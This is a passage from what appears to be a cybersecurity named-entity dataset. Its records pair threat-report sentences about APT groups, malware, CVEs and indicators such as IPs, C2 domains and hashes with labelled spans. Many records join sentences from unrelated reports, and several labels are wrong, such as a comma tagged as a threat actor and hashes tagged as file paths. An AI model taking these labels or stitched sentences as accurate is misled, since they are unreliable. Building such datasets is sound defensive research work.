The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors . The newest module’s compilation timestamp is March 2018 . Budworm aka LuckyMouse , Emissary Panda , APT27 deployed a previously unseen variant of its SysUpdate backdoor SysUpdate DLL inicore_v2.3.30.dll .", "spans": {"ORGANIZATION: energy": [[100, 106]], "ORGANIZATION: petrochemicals": [[111, 125]], "THREAT_ACTOR: threat groups": [[191, 204]], "THREAT_ACTOR: actors": [[266, 272]], "THREAT_ACTOR: Budworm": [[333, 340]], "THREAT_ACTOR: LuckyMouse": [[345, 355]], "THREAT_ACTOR: Emissary Panda": [[358, 372]], "THREAT_ACTOR: ,": [[373, 374]], "MALWARE: SysUpdate backdoor SysUpdate DLL inicore_v2.3.30.dll": [[425, 477]]}, "info": {"id": "cyberner_stix_train_004320", "source": "cyberner_stix_train"}} {"text": "The ultimate objective of targeted attacks is to acquire sensitive data . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": {"THREAT_ACTOR: XENOTIME": [[74, 82]]}, "info": {"id": "cyberner_stix_train_004321", "source": "cyberner_stix_train"}} {"text": "Copy the content from the server object into the new client object ( will not work if client implementation is different ) .", "spans": {}, "info": {"id": "cyberner_stix_train_004322", "source": "cyberner_stix_train"}} {"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": {"THREAT_ACTOR: APT10": [[26, 31]], "ORGANIZATION: U.S. 
law firm": [[48, 61]], "ORGANIZATION: apparel company": [[83, 98]], "TOOL: C2": [[187, 189]], "FILEPATH: rastls.dll": [[250, 260]], "FILEPATH: Sycmentec.config files": [[265, 287]]}, "info": {"id": "cyberner_stix_train_004323", "source": "cyberner_stix_train"}} {"text": "Screenshots from this developer ’ s YouTube video shows history of checking Ashas adware on Google Play ESET telemetry Figure 15 . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": {"SYSTEM: YouTube": [[36, 43]], "MALWARE: Ashas": [[76, 81]], "SYSTEM: Google Play": [[92, 103]], "ORGANIZATION: ESET": [[104, 108]], "MALWARE: regsvr32.exe": [[135, 147]], "MALWARE: SCT file": [[252, 260]], "VULNERABILITY: exploit": [[282, 289]], "VULNERABILITY: CVE-2018-4878": [[317, 330]], "THREAT_ACTOR: attacker": [[343, 351]]}, "info": {"id": "cyberner_stix_train_004324", "source": "cyberner_stix_train"}} {"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ? HawkEye is a versatile Trojan used by diverse actors for multiple purposes . In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks .", "spans": {"SYSTEM: Android": [[18, 25]], "MALWARE: TrickMo": [[45, 52]], "TOOL: HawkEye": [[90, 97]], "THREAT_ACTOR: actors": [[136, 142]], "THREAT_ACTOR: OilRig group": [[198, 210]], "MALWARE: ISMAgent": [[246, 254]]}, "info": {"id": "cyberner_stix_train_004325", "source": "cyberner_stix_train"}} {"text": "It can also access the phone ’ s cameras and microphone . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . 
Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"THREAT_ACTOR: Turla": [[72, 77]], "ORGANIZATION: RUAG": [[103, 107]], "ORGANIZATION: GovCERT.ch": [[171, 181]], "THREAT_ACTOR: threat groups": [[253, 266]], "ORGANIZATION: media organizations": [[287, 306]]}, "info": {"id": "cyberner_stix_train_004326", "source": "cyberner_stix_train"}} {"text": "Suckfly 's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company 's internal network .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_004327", "source": "cyberner_stix_train"}} {"text": "Based on information gained from discussion with the initial TRITON S-MAL/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye ’s analysis published in April 2019 , described in various media .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[61, 80]], "ORGANIZATION: Dragos": [[151, 157]], "ORGANIZATION: FireEye": [[242, 249]]}, "info": {"id": "cyberner_stix_train_004328", "source": "cyberner_stix_train"}} {"text": "As visible on following chart , the lifespan of many well-known rented Android bankers is usually no more than one or two years . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . APT38 .", "spans": {"SYSTEM: Android": [[71, 78]], "THREAT_ACTOR: Machete": [[147, 154]], "THREAT_ACTOR: APT38": [[339, 344]]}, "info": {"id": "cyberner_stix_train_004329", "source": "cyberner_stix_train"}} {"text": "After all , a working product is often more important than a stable product . 
The activity dates to at least 2013 and has ties to multiple reports by other researchers . Public disclosures may result in an immediate change in APT12 ’s tools . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"THREAT_ACTOR: APT12": [[226, 231]]}, "info": {"id": "cyberner_stix_train_004330", "source": "cyberner_stix_train"}} {"text": "The attackers deploy the Shamoon malware .", "spans": {"MALWARE: Shamoon": [[25, 32]]}, "info": {"id": "cyberner_stix_train_004331", "source": "cyberner_stix_train"}} {"text": "The conditions to build an additional payload are never met . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . Initial technical information about this feature was shared by the Thyssenkrupp CERT in the form of an Nmap script that could be used to identify Winnti infections through network scanning .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[81, 95]], "ORGANIZATION: Thyssenkrupp CERT": [[247, 264]], "TOOL: Nmap": [[283, 287]], "MALWARE: Winnti": [[326, 332]]}, "info": {"id": "cyberner_stix_train_004332", "source": "cyberner_stix_train"}} {"text": "We have worked with Google and they ensure that Google Play Protect proactively catches apps of this nature . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . 
In April 2019 , reports emerged of an intrusion involving Winnti malware at a GermanPharmaceutical company .", "spans": {"ORGANIZATION: Google": [[20, 26]], "SYSTEM: Google Play Protect": [[48, 67]], "THREAT_ACTOR: Lazarus": [[110, 117]], "MALWARE: Winnti": [[417, 423]], "ORGANIZATION: GermanPharmaceutical": [[437, 457]]}, "info": {"id": "cyberner_stix_train_004333", "source": "cyberner_stix_train"}} {"text": "Of note , this methodology of naming abstracts away the “ who ” element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"THREAT_ACTOR: XENOTIME": [[74, 82]]}, "info": {"id": "cyberner_stix_train_004334", "source": "cyberner_stix_train"}} {"text": "Many of the targets we identified were well known commercial organizations located in India .", "spans": {}, "info": {"id": "cyberner_stix_train_004335", "source": "cyberner_stix_train"}} {"text": "] it Catanzaro server2fi.exodus.connexxa [ . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity . Requesting commands from the C2 server : They have used phishing emails containing inline links to malicious URLs hosting DOUBLEDRAG malware , a highly obfuscated Javascript downloader .", "spans": {"THREAT_ACTOR: CNIIHM": [[45, 51]], "THREAT_ACTOR: TEMP.Veles": [[147, 157]], "TOOL: C2": [[198, 200]], "THREAT_ACTOR: used phishing emails containing inline links to malicious URLs hosting": [[220, 290]], "MALWARE: DOUBLEDRAG malware": [[291, 309]]}, "info": {"id": "cyberner_stix_train_004336", "source": "cyberner_stix_train"}} {"text": "Check Point analyzed Yingmob ’ s Umeng account to gain further insights into the HummingBad campaign and found that beyond the 10 million devices under the control of malicious apps , Yingmob has non-malicious apps installed on another 75 million or so devices . 
Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . APT33 : 64.251.19.214 [REDACTED].ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Yingmob": [[21, 28], [184, 191]], "MALWARE: HummingBad": [[81, 91]], "ORGANIZATION: Trend Micro": [[263, 274]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[302, 338]], "ORGANIZATION: Worry-Free™ Business Security": [[343, 372]], "ORGANIZATION: businesses": [[395, 405]], "MALWARE: malicious files": [[438, 453]], "THREAT_ACTOR: APT33": [[524, 529]], "IP_ADDRESS: 64.251.19.214": [[532, 545]], "DOMAIN: [REDACTED].ddns.net": [[546, 565]], "THREAT_ACTOR: Monti ransomware collective": [[572, 599]], "ORGANIZATION: legal and governmental fields": [[665, 694]]}, "info": {"id": "cyberner_stix_train_004337", "source": "cyberner_stix_train"}} {"text": "Infection vector and victims While looking for the infection vector , we found no evidence of spear phishing or any of the other common vectors . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering . This script in turn downloaded and executed a PowerShell backdoor known as POSHC2 , a proxy-aware C&C framework , from the C&C server ( https:// host-manager.hopto.org ) . 
But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": {"MALWARE: PowerShell backdoor": [[357, 376]], "MALWARE: POSHC2": [[386, 392]], "TOOL: proxy-aware C&C framework": [[397, 422]], "URL: https:// host-manager.hopto.org": [[447, 478]], "ORGANIZATION: Bradshaw": [[513, 521]], "ORGANIZATION: Avid Life": [[567, 576]], "ORGANIZATION: AshleyMadisonSucks.com": [[592, 614]]}, "info": {"id": "cyberner_stix_train_004338", "source": "cyberner_stix_train"}} {"text": "SpyNote RAT captured the device ’ s screen activities along with audio using the MediaProjectionCallback functionality ( available with Lollipop , the Android 5.0 release , and later ) and saved the output in a file named \" video.mp4 '' as shown in the following screenshot SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices , as shown in screenshot below : Stealing contacts The ability to steal contacts is a favorite feature for spyware developers , as the stolen contacts can be used to further spread the spyware Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence’s Trojan , known as Silence.MainModule . 
The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks .", "spans": {"MALWARE: SpyNote RAT": [[0, 11], [287, 298]], "SYSTEM: Lollipop": [[136, 144]], "SYSTEM: Android 5.0": [[151, 162]], "ORGANIZATION: Group-IB": [[558, 566]], "THREAT_ACTOR: Silence’s": [[669, 678]], "ORGANIZATION: financial institutions": [[762, 784]], "THREAT_ACTOR: Anunak": [[822, 828]], "MALWARE: Corkow": [[831, 837]], "THREAT_ACTOR: Buhtrap": [[840, 847]], "THREAT_ACTOR: Lurk groups": [[854, 865]], "ORGANIZATION: banks": [[912, 917]]}, "info": {"id": "cyberner_stix_train_004339", "source": "cyberner_stix_train"}} {"text": "These encoded strings contain the new URL addresses not seen in older versions of FakeSpy . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste” from a previously unknown APT . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident .", "spans": {"MALWARE: FakeSpy": [[82, 89]], "THREAT_ACTOR: FIN7": [[137, 141]], "ORGANIZATION: NCC Group 's Incident Response": [[284, 314]]}, "info": {"id": "cyberner_stix_train_004340", "source": "cyberner_stix_train"}} {"text": "The capabilities remained unchanged , but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays ( banking apps ) separately . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . 
The group focuses on companies that have intellectual property or sensitive information like those in the Defense and High-Tech industries .", "spans": {"TOOL: UPPERCUT": [[280, 288]], "THREAT_ACTOR: APT10": [[339, 344]], "ORGANIZATION: Defense and High-Tech": [[453, 474]]}, "info": {"id": "cyberner_stix_train_004341", "source": "cyberner_stix_train"}} {"text": "The main difference is that Smaps transmits data as plain text , while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The kit we found is in tgz format , though we have observed some samples disguised as png or jpg . Tools for phishing analysis and remediation that save security operations teams time and help find indicators of compromise across a sea of suspicious messages can also make a big difference in the fight against ransomware .", "spans": {"MALWARE: Smaps": [[28, 33]], "MALWARE: Asacub": [[71, 77]], "ORGANIZATION: CTU": [[156, 159]], "ORGANIZATION: U.S. defense": [[240, 252]], "ORGANIZATION: military capability": [[370, 389]]}, "info": {"id": "cyberner_stix_train_004342", "source": "cyberner_stix_train"}} {"text": "We have collected numerous samples spanning from 2016 to early 2019 . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government . The RAT starts by launching three threads . 
Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"ORGANIZATION: FireEye": [[192, 199]], "THREAT_ACTOR: APT34": [[215, 220]], "TOOL: RAT": [[268, 271]]}, "info": {"id": "cyberner_stix_train_004343", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 208.115.242.37 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 208.115.242.37": [[10, 24]]}, "info": {"id": "cyberner_stix_train_004344", "source": "cyberner_stix_train"}} {"text": "COSMICDUKE : First known activity January 2010 , Most recent known activity Summer 2015 , Other names Tinybaron , BotgenStudios , NemesisGemina , C&C communication methods HTTP(S) , FTP , WebDav , Known toolset components Information stealer , Multiple loaders , Privilege escalation component , Multiple persistence components .", "spans": {"MALWARE: COSMICDUKE": [[0, 10]], "MALWARE: Tinybaron": [[102, 111]], "MALWARE: BotgenStudios": [[114, 127]], "MALWARE: NemesisGemina": [[130, 143]], "TOOL: C&C": [[146, 149]], "TOOL: Information stealer": [[222, 241]], "TOOL: loaders": [[253, 260]]}, "info": {"id": "cyberner_stix_train_004345", "source": "cyberner_stix_train"}} {"text": "] com was a C2 for Poison Ivy samples associated with attacks on Myanmar and other Asian countries discussed in a blog published by Arbor Networks in April 2016 . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . 
APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor .", "spans": {"MALWARE: Poison Ivy": [[19, 29]], "ORGANIZATION: Arbor Networks": [[132, 146]], "THREAT_ACTOR: APT41": [[197, 202]], "THREAT_ACTOR: APT32": [[292, 297]], "MALWARE: Cobalt Strike BEACON backdoor": [[366, 395]]}, "info": {"id": "cyberner_stix_train_004346", "source": "cyberner_stix_train"}} {"text": "This APT group usually carries out target attacks against government agencies to steal sensitive information . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S .", "spans": {"ORGANIZATION: government agencies": [[58, 77]], "THREAT_ACTOR: TG-3390": [[111, 118]], "TOOL: C2": [[206, 208]]}, "info": {"id": "cyberner_stix_train_004347", "source": "cyberner_stix_train"}} {"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . jams481.site.bz .", "spans": {"MALWARE: malware": [[98, 105]], "TOOL: EternalBlue exploit": [[262, 281]], "THREAT_ACTOR: WannaCry": [[294, 302]], "DOMAIN: jams481.site.bz": [[326, 341]]}, "info": {"id": "cyberner_stix_train_004348", "source": "cyberner_stix_train"}} {"text": "For most of the OnionDuke components we observed , the first versions that we are aware of were compiled during the summer of 2013 , suggesting that this was a period of active development around this toolset .", "spans": {"MALWARE: OnionDuke": [[16, 25]]}, "info": {"id": "cyberner_stix_train_004349", "source": "cyberner_stix_train"}} {"text": "In 2018 , Kaspersky Labs published a report that analyzed Turla threat group . 
To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and SilenceProxyBot.NET , which are described in detail in the report Silence: moving into the darkside .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "THREAT_ACTOR: Turla": [[58, 63]], "MALWARE: Atmosphere Trojan": [[116, 133]], "THREAT_ACTOR: Silence": [[155, 162], [214, 221]], "MALWARE: xfs-disp.exe": [[185, 197]], "MALWARE: Silence.ProxyBot": [[259, 275]], "MALWARE: SilenceProxyBot.NET": [[280, 299]]}, "info": {"id": "cyberner_stix_train_004350", "source": "cyberner_stix_train"}} {"text": "CVE-2016-0034 : Microsoft Silverlight 5.1.41212.0 Vulnerability .", "spans": {"VULNERABILITY: CVE-2016-0034": [[0, 13]], "TOOL: Microsoft Silverlight": [[16, 37]]}, "info": {"id": "cyberner_stix_train_004351", "source": "cyberner_stix_train"}} {"text": "The NGOs targeted by BRONZE PRESIDENT conduct research on issues relevant to the PRC .", "spans": {"ORGANIZATION: NGOs": [[4, 8]], "THREAT_ACTOR: BRONZE PRESIDENT": [[21, 37]], "ORGANIZATION: PRC": [[81, 84]]}, "info": {"id": "cyberner_stix_train_004352", "source": "cyberner_stix_train"}} {"text": "In case of both the documents ( Uri Terror Report.doc and mha-report.doc ) the malicious macro code was heavily obfuscated (used obscure variable/function names to make analysis harder ) and did not contain any auto execute functions .", "spans": {"FILEPATH: Uri Terror Report.doc": [[32, 53]], "FILEPATH: mha-report.doc": [[58, 72]], "TOOL: macro code": [[89, 99]]}, "info": {"id": "cyberner_stix_train_004354", "source": "cyberner_stix_train"}} {"text": "In addition to the clicking activity , Judy displays a large amount of advertisements , which in some cases leave users with no option but clicking on the ad itself . 
Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests . The code waits for an incoming connection . Module ID Internal Name 1 module_ipc 2 module_monitor 3 module_apu 4 module_event 5 module_net", "spans": {"MALWARE: Judy": [[39, 43]], "ORGANIZATION: DHS": [[218, 221]]}, "info": {"id": "cyberner_stix_train_004355", "source": "cyberner_stix_train"}} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]], "FILEPATH: Mimikatz": [[170, 178]]}, "info": {"id": "cyberner_stix_train_004356", "source": "cyberner_stix_train"}} {"text": "Even though the Dukes appear to have targeted governments all over the world , we are unaware of them ever targeting the Russian government .", "spans": {"THREAT_ACTOR: Dukes": [[16, 21]]}, "info": {"id": "cyberner_stix_train_004357", "source": "cyberner_stix_train"}} {"text": "Deutsche Post - Deutsche Post DHL Group , a German multinational package delivery and supply chain management company headquartered in Bonn . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . 
Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group .", "spans": {"ORGANIZATION: Deutsche Post": [[0, 13]], "ORGANIZATION: DHL Group": [[30, 39]], "ORGANIZATION: Insikt": [[142, 148]], "THREAT_ACTOR: APT33": [[204, 209]], "THREAT_ACTOR: actors": [[316, 322]], "ORGANIZATION: 360": [[353, 356]], "ORGANIZATION: Tuisec": [[361, 367]], "THREAT_ACTOR: attackers": [[435, 444]], "ORGANIZATION: Unit 42": [[445, 452]], "THREAT_ACTOR: Gorgon Group": [[507, 519]]}, "info": {"id": "cyberner_stix_train_004358", "source": "cyberner_stix_train"}} {"text": "The official “ Golden Cup ” Facebook page . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth.com and bevendbrec.com . irongreen.exe : 404d25e3a18bda19a238f77270837198 c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f , Sun Dec 18 11:04:31 2011 UTC . irongreen.text : 85aa9117c381eae3d181ab63daab335e . irongreen.rdata : 3e1c774bc4e0ffc2271075e621aa3f3d . irongreen.data : 6c389e5e301564f65dcad4811dbded8b . irongreen.rsrc : efba623cc62ffd0ccbf7f3fbf6264905 . irongreen.reloc : 6cf46599a57a6cbc5d18fbb2883620ce . 
The fact that this activity occurred as recently as August 2023 suggests that the group is currently active , and that those organizations that may be of interest to Budworm should be aware of this activity and the groups current toolset .", "spans": {"MALWARE: Golden Cup": [[15, 25]], "SYSTEM: Facebook": [[28, 36]], "ORGANIZATION: consumer products corporations": [[109, 139]], "THREAT_ACTOR: APT32": [[186, 191]], "ORGANIZATION: Carbon Black": [[215, 227]], "MALWARE: Ursnif": [[277, 283]], "DOMAIN: iscondisth.com": [[333, 347]], "DOMAIN: bevendbrec.com": [[352, 366]], "FILEPATH: irongreen.exe": [[369, 382]], "FILEPATH: 404d25e3a18bda19a238f77270837198": [[385, 417]], "FILEPATH: c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f": [[418, 482]], "FILEPATH: irongreen.text": [[516, 530]], "FILEPATH: 85aa9117c381eae3d181ab63daab335e": [[533, 565]], "FILEPATH: irongreen.rdata": [[568, 583]], "FILEPATH: 3e1c774bc4e0ffc2271075e621aa3f3d": [[586, 618]], "FILEPATH: irongreen.data": [[621, 635]], "FILEPATH: 6c389e5e301564f65dcad4811dbded8b": [[638, 670]], "FILEPATH: irongreen.rsrc": [[673, 687]], "FILEPATH: efba623cc62ffd0ccbf7f3fbf6264905": [[690, 722]], "FILEPATH: irongreen.reloc": [[725, 740]], "FILEPATH: 6cf46599a57a6cbc5d18fbb2883620ce": [[743, 775]], "THREAT_ACTOR: the": [[856, 859]], "ORGANIZATION: organizations": [[903, 916]], "THREAT_ACTOR: Budworm": [[944, 951]], "THREAT_ACTOR: groups": [[993, 999]]}, "info": {"id": "cyberner_stix_train_004359", "source": "cyberner_stix_train"}} {"text": "The finding , in part , shows the risk that can come in opting for less expensive smartphones , whose manufacturers may not diligently fix security vulnerabilities . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . 
Daserf : 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a .", "spans": {"VULNERABILITY: security vulnerabilities": [[139, 163]], "ORGANIZATION: Rapid7": [[166, 172]], "THREAT_ACTOR: APT10": [[188, 193]], "MALWARE: ccSEUPDT.exe": [[218, 230]], "TOOL: Mimikatz": [[291, 299]], "MALWARE: Daserf": [[411, 417]], "FILEPATH: 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a": [[420, 484]]}, "info": {"id": "cyberner_stix_train_004360", "source": "cyberner_stix_train"}} {"text": "Captured legitimate user credentials when users interacted with these actor - controlled servers . we detected an ongoing campaign targeting a national data center in the Centeral Asia .", "spans": {"THREAT_ACTOR: actor": [[70, 75]]}, "info": {"id": "cyberner_stix_train_004361", "source": "cyberner_stix_train"}} {"text": "Further research of the attacker ’ s infrastructure revealed more related mimicking domains . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"THREAT_ACTOR: actor": [[125, 130]], "TOOL: Panda Banker": [[145, 157]], "ORGANIZATION: Arbor": [[222, 227]], "MALWARE: Panda Banker": [[298, 310]], "THREAT_ACTOR: admin@338": [[327, 336]], "ORGANIZATION: financial": [[384, 393]], "ORGANIZATION: economic": [[396, 404]], "ORGANIZATION: trade policy": [[409, 421]], "MALWARE: RATs": [[459, 463]], "MALWARE: Poison Ivy": [[472, 482]], "MALWARE: non-public backdoors": [[498, 518]]}, "info": {"id": "cyberner_stix_train_004362", "source": "cyberner_stix_train"}} {"text": "] net , negg1.ddns [ . 
We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations .", "spans": {"ORGANIZATION: We": [[23, 25]], "MALWARE: SEDNIT": [[135, 141]], "THREAT_ACTOR: admin@338": [[218, 227]], "TOOL: emails": [[248, 254]], "ORGANIZATION: media organizations": [[286, 305]]}, "info": {"id": "cyberner_stix_train_004363", "source": "cyberner_stix_train"}} {"text": "Permissions The package name follows the original style name used on DenDroid . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice . APT12 . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"MALWARE: DenDroid": [[69, 77]], "TOOL: Gray Lambert": [[112, 124]], "TOOL: mwapi32.dll": [[129, 140]], "TOOL: poolstr.dll": [[145, 156]], "TOOL: Lamberts": [[218, 226]], "THREAT_ACTOR: APT12": [[281, 286]], "SYSTEM: Google Analytics": [[401, 417]]}, "info": {"id": "cyberner_stix_train_004364", "source": "cyberner_stix_train"}} {"text": "Figure 12 : Fake Bank Austria Security application icon In addition to operating as a banking Trojan , overlaying a legitimate banking app with an indistinguishable credential theft page , the malware also asks for credit card information from the user when they open applications such as the Google Play store . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . 
Deep Panda is a suspected Chinese threat group known to target many industries , including government , defense , financial , and telecommunications .", "spans": {"SYSTEM: Fake Bank Austria Security application": [[12, 50]], "SYSTEM: Google Play": [[293, 304]], "THREAT_ACTOR: CIA": [[317, 320]], "TOOL: Windows": [[404, 411]], "TOOL: Mac OS X": [[414, 422]], "TOOL: Solaris": [[425, 432]], "TOOL: Linux": [[435, 440]], "TOOL: HIVE": [[466, 470]], "TOOL: Cutthroat": [[487, 496]], "TOOL: Swindle": [[501, 508]], "THREAT_ACTOR: Deep Panda": [[569, 579]]}, "info": {"id": "cyberner_stix_train_004365", "source": "cyberner_stix_train"}} {"text": "He also used his email account to log into various services in the video , which identifies him as the adware domain owner , beyond any doubt . Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system .", "spans": {"MALWARE: Ploutus-D": [[144, 153]], "MALWARE: (K3A.Platform.dll)": [[226, 244]], "THREAT_ACTOR: HIDDEN COBRA": [[367, 379]], "MALWARE: Bankshot": [[383, 391]], "MALWARE: malware": [[392, 399]]}, "info": {"id": "cyberner_stix_train_004366", "source": "cyberner_stix_train"}} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . 
Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "VULNERABILITY: CVE-2012-0158": [[217, 230]], "VULNERABILITY: exploit": [[234, 241]], "FILEPATH: Microsoft Word": [[242, 256]]}, "info": {"id": "cyberner_stix_train_004367", "source": "cyberner_stix_train"}} {"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "ORGANIZATION: payment services": [[19, 35]], "MALWARE: Confucius' backdoors": [[124, 144]], "VULNERABILITY: CVE-2015-1641": [[229, 242]], "VULNERABILITY: CVE-2017-11882": [[247, 261]]}, "info": {"id": "cyberner_stix_train_004368", "source": "cyberner_stix_train"}} {"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": {"ORGANIZATION: government officials": [[163, 183]], "ORGANIZATION: IT": [[292, 294]], "ORGANIZATION: financial institutions": [[333, 355]]}, "info": {"id": "cyberner_stix_train_004369", "source": "cyberner_stix_train"}} {"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ? Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 . 
